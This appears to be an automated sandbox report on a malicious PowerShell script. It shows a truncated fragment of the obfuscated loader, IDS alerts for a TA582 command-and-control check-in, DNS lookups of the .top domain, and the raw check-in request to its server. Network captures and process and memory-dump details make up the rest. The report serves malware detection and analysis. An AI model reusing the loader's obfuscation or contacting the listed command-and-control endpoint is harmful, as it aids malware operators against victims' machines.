                                                                                                    SSDEEP:384:HMEfTdQ241pDEv4HU71GPpaeabg3Y65E76gveMZdPCxRO9ULPJbNHaLCoACa:sEfv84S4Gglbg3JZ5UPCbO9ULf2o9
                                                                                                    TLSH:E4924BA47B48E5E1D2DC863E59437C14BA56B5AED1DFBEC079AAD1C33791300BB89C80
                                                                                                    File Content Preview:$xqizhfkvr=$executioncontext;$reatananisinerisaninatonbetionenesarin = ([Char[]]@((-2653+(-517+3223)),(184600/3550),(576327/(6656+3455)),(4283-(-3232+(7848-(2484521/(55697382/8586))))),(-8451+8507),(3622-(-5727+9295)),(1114-1058),(2323-2268),(-1987+2042),
                                                                                                    Icon Hash:3270d6baae77db44
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2025-01-07T16:46:02.991136+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.204974345.61.136.13880TCP
                                                                                                    2025-01-07T16:46:02.991136+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204974345.61.136.13880TCP
                                                                                                    2025-01-07T16:46:03.369182+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.2049744172.217.1.10080TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 7, 2025 16:46:02.558907032 CET4974380192.168.11.2045.61.136.138
                                                                                                    Jan 7, 2025 16:46:02.730663061 CET804974345.61.136.138192.168.11.20
                                                                                                    Jan 7, 2025 16:46:02.730797052 CET4974380192.168.11.2045.61.136.138
                                                                                                    Jan 7, 2025 16:46:02.733308077 CET4974380192.168.11.2045.61.136.138
                                                                                                    Jan 7, 2025 16:46:02.904896021 CET804974345.61.136.138192.168.11.20
                                                                                                    Jan 7, 2025 16:46:02.942634106 CET804974345.61.136.138192.168.11.20
                                                                                                    Jan 7, 2025 16:46:02.991136074 CET4974380192.168.11.2045.61.136.138
                                                                                                    Jan 7, 2025 16:46:03.064640045 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.183147907 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.183388948 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.183526993 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.301841021 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.368766069 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.368845940 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.368993998 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.369079113 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.369182110 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.369191885 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.369317055 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.369426012 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.369523048 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.369538069 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.369663000 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.369693041 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.369693995 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.369820118 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.370032072 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.487596035 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.487879992 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.488087893 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.491983891 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.492053032 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.492218971 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.500828028 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.500890970 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.501096010 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.509200096 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.509450912 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.509610891 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.518132925 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.518191099 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.518460989 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.526671886 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.526798010 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.526969910 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.535415888 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.535557985 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.535962105 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.543889999 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.543987036 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.544145107 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.552746058 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.552778006 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.552964926 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.561295033 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.561388016 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.561671972 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.606648922 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.606738091 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.606987000 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.610908985 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.611140013 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.611296892 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.619549036 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.619652987 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.619805098 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.627026081 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.627250910 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.627403975 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.634648085 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.634737015 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.634972095 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.642055035 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.642118931 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.642354012 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.649521112 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.649600983 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.649806976 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.656920910 CET8049744172.217.1.100192.168.11.20
                                                                                                    Jan 7, 2025 16:46:03.709743977 CET4974480192.168.11.20172.217.1.100
                                                                                                    Jan 7, 2025 16:46:03.827610016 CET4974380192.168.11.2045.61.136.138
                                                                                                    Jan 7, 2025 16:46:03.827733994 CET4974480192.168.11.20172.217.1.100
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 7, 2025 16:46:02.376315117 CET6016653192.168.11.201.1.1.1
                                                                                                    Jan 7, 2025 16:46:02.551758051 CET53601661.1.1.1192.168.11.20
                                                                                                    Jan 7, 2025 16:46:02.944258928 CET5129553192.168.11.201.1.1.1
                                                                                                    Jan 7, 2025 16:46:03.063576937 CET53512951.1.1.1192.168.11.20
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 7, 2025 16:46:02.376315117 CET192.168.11.201.1.1.10x4a19Standard query (0)jjdgdeffjimfgne.topA (IP address)IN (0x0001)false
                                                                                                    Jan 7, 2025 16:46:02.944258928 CET192.168.11.201.1.1.10xa27cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 7, 2025 16:46:02.551758051 CET1.1.1.1192.168.11.200x4a19No error (0)jjdgdeffjimfgne.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                    Jan 7, 2025 16:46:03.063576937 CET1.1.1.1192.168.11.200xa27cNo error (0)www.google.com172.217.1.100A (IP address)IN (0x0001)false
                                                                                                    • jjdgdeffjimfgne.top
                                                                                                    • www.google.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.11.204974345.61.136.138807384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 7, 2025 16:46:02.733308077 CET215OUTGET /0ouyalt7pvhtr.php?id=computer&key=66159843360&s=527 HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                    Host: jjdgdeffjimfgne.top
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 7, 2025 16:46:02.942634106 CET166INHTTP/1.1 302 Found
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Tue, 07 Jan 2025 15:46:02 GMT
                                                                                                    Content-Length: 0
                                                                                                    Connection: keep-alive
                                                                                                    Location: http://www.google.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.11.2049744172.217.1.100807384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 7, 2025 16:46:03.183526993 CET159OUTGET / HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                    Host: www.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 7, 2025 16:46:03.368766069 CET1289INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 07 Jan 2025 15:46:03 GMT
                                                                                                    Expires: -1
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-bj6_0BCktjcE2XYwBsbjmw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                    Server: gws
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    Set-Cookie: AEC=AZ6Zc-V7eQp6y_6Jh4izgFzPCDBTB1ZSC9Qy25NAVXy8KEvb_ubKHqTjJg; expires=Sun, 06-Jul-2025 15:46:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                    Set-Cookie: NID=520=botTVtskYhmCkIRAJyIITyq7NCtrH5ClZb5NWGWStsevxd3BcBEMBW-KrffuE3M3br4nGyTNqnTQBnHJuS3VAxHxTWcR48A4i8yX1TveoWgw5FF1o1wpL7BOwWy2gNeTyFCzb_rm3bbxOLgSNIS4l7-oWs1b4fFvHX0yDyqDzwUeSS0HBDKafBQ3Y6EWEBVDA_gHd21H; expires=Wed, 09-Jul-2025 15:46:03 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                    Accept-Ranges: none
                                                                                                    Vary: Accept-Encoding
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Data Raw: 34 39 61 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68
                                                                                                    Data Ascii: 49a4<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to h
                                                                                                    Jan 7, 2025 16:46:03.368845940 CET1289INData Raw: 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e
                                                                                                    Data Ascii: elp you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.
                                                                                                    Jan 7, 2025 16:46:03.368993998 CET1289INData Raw: 33 37 2c 34 36 34 2c 32 2c 39 32 31 2c 31 36 35 2c 36 36 37 2c 35 32 37 2c 31 33 36 38 2c 32 2c 31 36 36 2c 31 38 30 2c 39 31 36 2c 34 34 36 2c 35 2c 37 36 2c 38 34 35 2c 36 2c 35 36 39 2c 31 30 36 2c 39 30 37 2c 34 33 30 2c 32 30 38 2c 34 37 2c
                                                                                                    Data Ascii: 37,464,2,921,165,667,527,1368,2,166,180,916,446,5,76,845,6,569,106,907,430,208,47,24,399,8,213,3,11,452,40,460,1,6,832,331,194,51,151,362,429,2,7,1,200,42,1,31,353,2,126,118,899,253,142,602,704,456,268,225,339,175,1,81,662,675,152,3,829,325,16
                                                                                                    Jan 7, 2025 16:46:03.369079113 CET1289INData Raw: 22 3f 61 74 79 70 3d 69 26 63 74 3d 22 2b 53 74 72 69 6e 67 28 61 29 2b 22 26 63 61 64 3d 22 2b 28 62 2b 65 2b 63 29 7d 3b 6c 3d 67 6f 6f 67 6c 65 2e 6b 45 49 3b 67 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49
                                                                                                    Data Ascii: "?atyp=i&ct="+String(a)+"&cad="+(b+e+c)};l=google.kEI;google.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror
                                                                                                    Jan 7, 2025 16:46:03.369191885 CET1289INData Raw: 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65
                                                                                                    Data Ascii: ntListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:1
                                                                                                    Jan 7, 2025 16:46:03.369317055 CET1289INData Raw: 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78
                                                                                                    Data Ascii: :0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:bloc
                                                                                                    Jan 7, 2025 16:46:03.369426012 CET1289INData Raw: 2e 67 62 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36
                                                                                                    Data Ascii: .gbzt,.gbgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:r
                                                                                                    Jan 7, 2025 16:46:03.369538069 CET1289INData Raw: 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 30 3b 2a 70 61 64
                                                                                                    Data Ascii: d-image:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.
                                                                                                    Jan 7, 2025 16:46:03.369663000 CET1289INData Raw: 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 6d 6c 31
                                                                                                    Data Ascii: k;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-spa
                                                                                                    Jan 7, 2025 16:46:03.369820118 CET1289INData Raw: 78 7d 23 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61
                                                                                                    Data Ascii: x}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10p
                                                                                                    Jan 7, 2025 16:46:03.487596035 CET1289INData Raw: 78 7d 2e 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f
                                                                                                    Data Ascii: x}.gbxv{visibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:10:45:58
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                    Imagebase:0x7ff66a570000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:10:45:58
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7d4e80000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Reset < >
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15494275793.00007FF829010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF829010000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff829010000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7e1a4a7dbb879789b796ff77d409a087fc61ac74cf0e5c91a3d6129d0c37230b
                                                                                                      • Instruction ID: eff44699ae66cd0712de3374c47fdb627e882a98121ca564479d3d918de7c0c1
                                                                                                      • Opcode Fuzzy Hash: 7e1a4a7dbb879789b796ff77d409a087fc61ac74cf0e5c91a3d6129d0c37230b
                                                                                                      • Instruction Fuzzy Hash: F1F2B071E0CA898FEB99EB6888A566877E1FF55744F5840BDC00DCB293EE28EC45C741
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8b75975a0ffdc11d24c572a99c5d320d5c8f0ac56717d706e5459db6ab58e49a
                                                                                                      • Instruction ID: 42b9a2aa4d39b0dbf71c1b3046e1a8c7c0318812ebca61f0a727e628628569be
                                                                                                      • Opcode Fuzzy Hash: 8b75975a0ffdc11d24c572a99c5d320d5c8f0ac56717d706e5459db6ab58e49a
                                                                                                      • Instruction Fuzzy Hash: 90F1A270908A8D8FEFA8DF28CC457E937D1FB54391F04426AE84DC7291CF34A9498B86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1fae3653ba0685bdf1d5616535703f717621fd9fc7dee1c93573640aa74dad14
                                                                                                      • Instruction ID: c06353740ece7749a4bbc9971e475851effca14f0ae21c8cc8070400dc0993e9
                                                                                                      • Opcode Fuzzy Hash: 1fae3653ba0685bdf1d5616535703f717621fd9fc7dee1c93573640aa74dad14
                                                                                                      • Instruction Fuzzy Hash: 72E1C170908A8E8FEBA8DF28CC557E977D1FB54351F04426EE84DC7295DF74A8488B81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15494275793.00007FF829010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF829010000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff829010000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 318865ae92bbd0d0339e117bdf27b511c6a39d1ea18b632372a269d56242221a
                                                                                                      • Instruction ID: 5dae4dafbc98a817baf0fcdb4dacb1ca2e3906608a3146ba019aca8ce0276820
                                                                                                      • Opcode Fuzzy Hash: 318865ae92bbd0d0339e117bdf27b511c6a39d1ea18b632372a269d56242221a
                                                                                                      • Instruction Fuzzy Hash: 54E18F31A1CA8A8FEB59EB2888556A877E1FF55740F1801B9D049CB2D3EE28FC46C741
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 34918d27b7fe37921caed32937dd28cf25036c5a0242023479b2215930452c01
                                                                                                      • Instruction ID: f995e9afbd28aabc437abe5f33e8435164d3397893cd765780e2f9ebf3727a9a
                                                                                                      • Opcode Fuzzy Hash: 34918d27b7fe37921caed32937dd28cf25036c5a0242023479b2215930452c01
                                                                                                      • Instruction Fuzzy Hash: 0EB1B170908A8D4FEBA8DF289C557E93BD1FF55350F04426AE84DC7292CF34A949CB86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15491145433.00007FF828DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828DA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828da0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 474eb0ae87f1dd8222fc66532a901fa77926e49a926168068240b46fff52aebc
                                                                                                      • Instruction ID: d23e8c05d42d0c991a55ea9a85fa285620aee3b9b8dbba9a2570a73dc8bf5563
                                                                                                      • Opcode Fuzzy Hash: 474eb0ae87f1dd8222fc66532a901fa77926e49a926168068240b46fff52aebc
                                                                                                      • Instruction Fuzzy Hash: 1691EA6390DAC54FFB16962C5C691E97FE0EF96365F5802BFC08987093DE14780E8395
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.15490664578.00007FF828C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF828C8D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff828c8d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 19890b8c1620163a6dd2fe5eb617a955ff408789b99611ca0b1e17b0f645d08b
                                                                                                      • Instruction ID: f54884112be98c0b2a5dff2eefdb3ac22c304bf91232988d683d4f3da7772c74
